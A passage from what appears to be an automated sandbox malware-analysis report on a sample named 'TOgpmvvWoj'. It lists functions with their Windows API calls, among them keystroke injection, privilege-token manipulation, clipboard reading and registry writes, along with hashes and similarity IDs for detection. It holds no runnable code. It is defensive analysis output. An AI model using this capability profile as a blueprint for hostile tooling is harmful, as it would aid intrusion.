                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00E4E16B,?,?,00000000), ref: 00E15DBF
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 6a0bcbcdd9847ba66f632931da6b9ca852f483d066a22366631536675f9c1b1b
                                            • Instruction ID: cfeff2412ebe0ded8530f293c527f5d16dec1f450d75138182d1f7c1b1352de4
                                            • Opcode Fuzzy Hash: 6a0bcbcdd9847ba66f632931da6b9ca852f483d066a22366631536675f9c1b1b
                                            • Instruction Fuzzy Hash: 8DD0C77464030CBFE710DB81DC46FA9777CD705710F100295FD04A6290D6B27D548795
                                            Function 00E3548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __wfsopen
                                            • String ID:
                                            • API String ID: 197181222-0
                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                            • Instruction ID: 9beb8227ac7dbbbd57230b200d9f4157adafa6abccb2052f6aaf6db7bfb36036
                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                            • Instruction Fuzzy Hash: 92B0927684020C77DF012E82EC02A593F599B40678F808020FB1C28262A673A6A09689
                                            Function 00E7D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(00000002,00000000), ref: 00E7D46A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorLast
                                            • String ID:
                                            • API String ID: 1452528299-0
                                            • Opcode ID: 90f319374b37fe57596cd2788b9c0d1da4c0aa149f113cf2d951270745579536
                                            • Instruction ID: 022944c0bef9493d755785c1ca084664ad962317b233afe6c3a00d0530fd712c
                                            • Opcode Fuzzy Hash: 90f319374b37fe57596cd2788b9c0d1da4c0aa149f113cf2d951270745579536
                                            • Instruction Fuzzy Hash: 1B714431208302DFC714EF24D891AAEB7F5AF88714F04556DF49AA7292DB30ED49CB52
                                            Function 00E30E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                            • Instruction ID: f50b302df2071ba3dda9b5a65ddb7cecf68860714769aae1dd430622e4c57efb
                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                            • Instruction Fuzzy Hash: 3531F374B00105DFCB18DF49C4A8969FBA6FF59304F24AAA5E409EB651D730EDC1CB80
                                            Function 00D422A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(000001F4), ref: 00D422B1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                            • Instruction ID: 95689bf0768722367b57cb4ce1e429df106723765f38083feacaedb647c44ec1
                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                            • Instruction Fuzzy Hash: BFE0E67494010EDFDB00EFB8D5496AE7FF4EF04301F100161FD01D2280D6709D508A72

                                            Non-executed Functions

                                            Function 00E9CDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E9CE50
                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E9CE91
                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E9CED6
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E9CF00
                                            • SendMessageW.USER32 ref: 00E9CF29
                                            • _wcsncpy.LIBCMT ref: 00E9CFA1
                                            • GetKeyState.USER32(00000011), ref: 00E9CFC2
                                            • GetKeyState.USER32(00000009), ref: 00E9CFCF
                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E9CFE5
                                            • GetKeyState.USER32(00000010), ref: 00E9CFEF
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E9D018
                                            • SendMessageW.USER32 ref: 00E9D03F
                                            • SendMessageW.USER32(?,00001030,?,00E9B602), ref: 00E9D145
                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E9D15B
                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E9D16E
                                            • SetCapture.USER32(?), ref: 00E9D177
                                            • ClientToScreen.USER32(?,?), ref: 00E9D1DC
                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E9D1E9
                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E9D203
                                            • ReleaseCapture.USER32 ref: 00E9D20E
                                            • GetCursorPos.USER32(?), ref: 00E9D248
                                            • ScreenToClient.USER32(?,?), ref: 00E9D255
                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E9D2B1
                                            • SendMessageW.USER32 ref: 00E9D2DF
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E9D31C
                                            • SendMessageW.USER32 ref: 00E9D34B
                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E9D36C
                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E9D37B
                                            • GetCursorPos.USER32(?), ref: 00E9D39B
                                            • ScreenToClient.USER32(?,?), ref: 00E9D3A8
                                            • GetParent.USER32(?), ref: 00E9D3C8
                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E9D431
                                            • SendMessageW.USER32 ref: 00E9D462
                                            • ClientToScreen.USER32(?,?), ref: 00E9D4C0
                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E9D4F0
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E9D51A
                                            • SendMessageW.USER32 ref: 00E9D53D
                                            • ClientToScreen.USER32(?,?), ref: 00E9D58F
                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E9D5C3
                                              • Part of subcall function 00E125DB: GetWindowLongW.USER32(?,000000EB), ref: 00E125EC
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E9D65F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                            • String ID: @GUI_DRAGID$F$pr
                                            • API String ID: 3977979337-1436871235
                                            • Opcode ID: 5e68642eb2c4ed57a642ff4f0418b0d35dd94e8756d853a94654dcd228be277b
                                            • Instruction ID: bc97b0b7a8bb70b0df6f968f7f0909ce65cd261c133b8f035293091816c63088
                                            • Opcode Fuzzy Hash: 5e68642eb2c4ed57a642ff4f0418b0d35dd94e8756d853a94654dcd228be277b
                                            • Instruction Fuzzy Hash: B142B074204341AFCB25DF28CC54FAABBE6FF49318F24151EF696A72A1C7319854CB92
                                            Function 00E9804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00E9873F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: %d/%02d/%02d
                                            • API String ID: 3850602802-328681919
                                            • Opcode ID: f57b258cfa060b86b9ec3979fcf9c8f456aa87b3d40c9acc92947b2f9bacee01
                                            • Instruction ID: b6080e2797e2e92047c5eec9dba29e030fe6945dd452c364c4d2ace17af22f22
                                            • Opcode Fuzzy Hash: f57b258cfa060b86b9ec3979fcf9c8f456aa87b3d40c9acc92947b2f9bacee01
                                            • Instruction Fuzzy Hash: 7112DE71600204AFEF248F65CD49FAA7BF9EF46714F20612AF916FA2B1DB708945CB50
                                            Function 00E2710E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5093COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove$_memset
                                            • String ID: 0w$DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                            • API String ID: 1357608183-332139107
                                            • Opcode ID: 55a5989e56146b2dee25be34153e882cf8aac2d2575fc8a9ce44c2f3c64508cc
                                            • Instruction ID: 0a829d71edea4cdb7af4efce889169dd7eb4ff0df22495d7eaf488db0a1a1be5
                                            • Opcode Fuzzy Hash: 55a5989e56146b2dee25be34153e882cf8aac2d2575fc8a9ce44c2f3c64508cc
                                            • Instruction Fuzzy Hash: E993A171A40219DFDB24CF68E881BEDB7B1FF48354F24916AE955BB290E7709E81CB40
                                            Function 00E14A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetForegroundWindow.USER32(00000000,?), ref: 00E14A3D
                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E4DA8E
                                            • IsIconic.USER32(?), ref: 00E4DA97
                                            • ShowWindow.USER32(?,00000009), ref: 00E4DAA4
                                            • SetForegroundWindow.USER32(?), ref: 00E4DAAE
                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E4DAC4
                                            • GetCurrentThreadId.KERNEL32 ref: 00E4DACB
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E4DAD7
                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E4DAE8
                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E4DAF0
                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E4DAF8
                                            • SetForegroundWindow.USER32(?), ref: 00E4DAFB
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4DB10
                                            • keybd_event.USER32(00000012,00000000), ref: 00E4DB1B
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4DB25
                                            • keybd_event.USER32(00000012,00000000), ref: 00E4DB2A
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4DB33
                                            • keybd_event.USER32(00000012,00000000), ref: 00E4DB38
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E4DB42
                                            • keybd_event.USER32(00000012,00000000), ref: 00E4DB47
                                            • SetForegroundWindow.USER32(?), ref: 00E4DB4A
                                            • AttachThreadInput.USER32(?,?,00000000), ref: 00E4DB71
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                            • String ID: Shell_TrayWnd
                                            • API String ID: 4125248594-2988720461
                                            • Opcode ID: 82b6d22fb92af13d25cf55eea054f93074c84c0ae0b336ec4d8d1e083d80da70
                                            • Instruction ID: b2cefe4f09b8ccad3ed08c5dc7233a73cc3322c0e9c8b80e639c5ccff2c6a18c
                                            • Opcode Fuzzy Hash: 82b6d22fb92af13d25cf55eea054f93074c84c0ae0b336ec4d8d1e083d80da70
                                            • Instruction Fuzzy Hash: B1316571A44318BFEB216FA29C49FBF3E6CEB44B50F114027FA04FA1D1D6B05D11AAA1
                                            Function 00E68858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E68CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E68D0D
                                              • Part of subcall function 00E68CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E68D3A
                                              • Part of subcall function 00E68CC3: GetLastError.KERNEL32 ref: 00E68D47
                                            • _memset.LIBCMT ref: 00E6889B
                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E688ED
                                            • CloseHandle.KERNEL32(?), ref: 00E688FE
                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E68915
                                            • GetProcessWindowStation.USER32 ref: 00E6892E
                                            • SetProcessWindowStation.USER32(00000000), ref: 00E68938
                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E68952
                                              • Part of subcall function 00E68713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E68851), ref: 00E68728
                                              • Part of subcall function 00E68713: CloseHandle.KERNEL32(?,?,00E68851), ref: 00E6873A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                            • String ID: $default$winsta0
                                            • API String ID: 2063423040-1027155976
                                            • Opcode ID: 72fab37e4e2403c9cb730a8e94fc179ace7c045559e36218095a1f30f330a94a
                                            • Instruction ID: 8b2cc32e8bea41967ee31d13d042690fd5554a6dac7a7e36e253ee6c282bd2e3
                                            • Opcode Fuzzy Hash: 72fab37e4e2403c9cb730a8e94fc179ace7c045559e36218095a1f30f330a94a
                                            • Instruction Fuzzy Hash: AE813F71980209AFDF11DFE4EE45AEE7BB8AF04354F18526AFD10B6161DB318D14DB60
                                            Function 00E8425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OpenClipboard.USER32(00E9F910), ref: 00E84284
                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E84292
                                            • GetClipboardData.USER32(0000000D), ref: 00E8429A
                                            • CloseClipboard.USER32 ref: 00E842A6
                                            • GlobalLock.KERNEL32(00000000), ref: 00E842C2
                                            • CloseClipboard.USER32 ref: 00E842CC
                                            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00E842E1
                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00E842EE
                                            • GetClipboardData.USER32(00000001), ref: 00E842F6
                                            • GlobalLock.KERNEL32(00000000), ref: 00E84303
                                            • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00E84337
                                            • CloseClipboard.USER32 ref: 00E84447
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                            • String ID:
                                            • API String ID: 3222323430-0
                                            • Opcode ID: d4086eede193250e93be0b3bbbe91bb48d30cb52d0fd0f8124b92aa8c13d9413
                                            • Instruction ID: db75bf3f6f1f51845fb94744adff32ef73a4a03a66ec97ea8b56f4098724965c
                                            • Opcode Fuzzy Hash: d4086eede193250e93be0b3bbbe91bb48d30cb52d0fd0f8124b92aa8c13d9413
                                            • Instruction Fuzzy Hash: 3D517E71204306AFD311BF61EC95FAE77A8EF84B04F10552AF55AF21E2DB7099488B62
                                            Function 00E7C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?), ref: 00E7C9F8
                                            • FindClose.KERNEL32(00000000), ref: 00E7CA4C
                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E7CA71
                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E7CA88
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E7CAAF
                                            • __swprintf.LIBCMT ref: 00E7CAFB
                                            • __swprintf.LIBCMT ref: 00E7CB3E
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                            • __swprintf.LIBCMT ref: 00E7CB92
                                              • Part of subcall function 00E338D8: __woutput_l.LIBCMT ref: 00E33931
                                            • __swprintf.LIBCMT ref: 00E7CBE0
                                              • Part of subcall function 00E338D8: __flsbuf.LIBCMT ref: 00E33953
                                              • Part of subcall function 00E338D8: __flsbuf.LIBCMT ref: 00E3396B
                                            • __swprintf.LIBCMT ref: 00E7CC2F
                                            • __swprintf.LIBCMT ref: 00E7CC7E
                                            • __swprintf.LIBCMT ref: 00E7CCCD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                            • API String ID: 3953360268-2428617273
                                            • Opcode ID: c231a5ca221931f319f6c262d0f2a15065aa44e9f3bff60c99f26cba668f4051
                                            • Instruction ID: ea2e4695f9a32881d588032e84f7148554551f36cd94bdc69c8456ae3186914e
                                            • Opcode Fuzzy Hash: c231a5ca221931f319f6c262d0f2a15065aa44e9f3bff60c99f26cba668f4051
                                            • Instruction Fuzzy Hash: A5A14FB2508304ABC710EB60C895DEFB7ECAF98705F40591EF596E3192EB34DA49C762
                                            Function 00E7F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00E7F221
                                            • _wcscmp.LIBCMT ref: 00E7F236
                                            • _wcscmp.LIBCMT ref: 00E7F24D
                                            • GetFileAttributesW.KERNEL32(?), ref: 00E7F25F
                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00E7F279
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00E7F291
                                            • FindClose.KERNEL32(00000000), ref: 00E7F29C
                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00E7F2B8
                                            • _wcscmp.LIBCMT ref: 00E7F2DF
                                            • _wcscmp.LIBCMT ref: 00E7F2F6
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E7F308
                                            • SetCurrentDirectoryW.KERNEL32(00ECA5A0), ref: 00E7F326
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E7F330
                                            • FindClose.KERNEL32(00000000), ref: 00E7F33D
                                            • FindClose.KERNEL32(00000000), ref: 00E7F34F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                            • String ID: *.*
                                            • API String ID: 1803514871-438819550
                                            • Opcode ID: 567b2ec52864aba8690447c8630548d1f659078123c7bc72af9fafe0435fa52a
                                            • Instruction ID: 44a97df5be2b92407bc10d55eb9ad6bc0658f629ee86a8d94175a965527656d1
                                            • Opcode Fuzzy Hash: 567b2ec52864aba8690447c8630548d1f659078123c7bc72af9fafe0435fa52a
                                            • Instruction Fuzzy Hash: 5D319E766002196EDB10DBB5EC59EEE77ECAF08364F149177E818F30A0EB34DA45CA50
                                            Function 00E90AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E90BDE
                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E9F910,00000000,?,00000000,?,?), ref: 00E90C4C
                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E90C94
                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E90D1D
                                            • RegCloseKey.ADVAPI32(?), ref: 00E9103D
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E9104A
                                            Strings
                                            Memory Dump Source
